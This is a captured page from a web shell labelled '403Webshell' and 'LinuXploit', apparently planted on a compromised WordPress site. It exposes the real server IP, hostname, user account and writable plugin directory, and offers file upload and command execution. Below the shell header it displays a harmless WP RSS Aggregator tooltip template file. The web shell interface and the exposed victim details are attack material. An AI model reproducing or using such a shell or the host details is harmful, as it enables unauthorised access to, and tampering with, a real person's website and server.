403Webshell
Server IP : 49.212.180.16  /  Your IP : 13.59.172.7
Web Server : Apache
System : FreeBSD www2606.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User : utannto ( 1076)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/utannto/www/hironaka.biz/wp-content/plugins/wp-rss-aggregator/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/utannto/www/hironaka.biz/wp-content/plugins/wp-rss-aggregator/templates/help-footer-js.php
<?php
/**
 * Template for WP RSS Aggregator tooltip JavaScript for the footer.
 * 
 * @package   WPRSSAggregator
 * @author    Jean Galea <info@wprssaggregator.com>
 * @copyright Copyright (c) 2012-2014, Jean Galea
 * @link      http://www.wprssaggregator.com/
 * @license   http://www.gnu.org/licenses/gpl.html
 */
?>
<script type="text/javascript" id="<?php echo WPRSS_Help::get_instance()->prefix('footer-js') ?>">
	(function($, document, window) {
		$(function() {
			var tooltipHandleClass = '<?php echo isset( $vars['tooltip_handle_class'] ) ? $vars['tooltip_handle_class'] : '' ?>';
			
			// If class defined
			tooltipHandleClass.length && (function() {
				$('.'+tooltipHandleClass).tooltip({
					items: '*',
					tooltipClass: '<?php echo $vars['tooltip_class'] ?>',
					hide: 100,
					show: 100,
					position:  {
						my: 'left+3 top+3',
						at: 'right bottom'
					},
					content: function(){
						var $this = $(this);
						return $($this.attr('href')).html();
					}
				});
				
				$('.'+tooltipHandleClass).on('click', function(e) {
					e.preventDefault();
				});
			})();
		});
	})(jQuery, document, top, undefined);
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit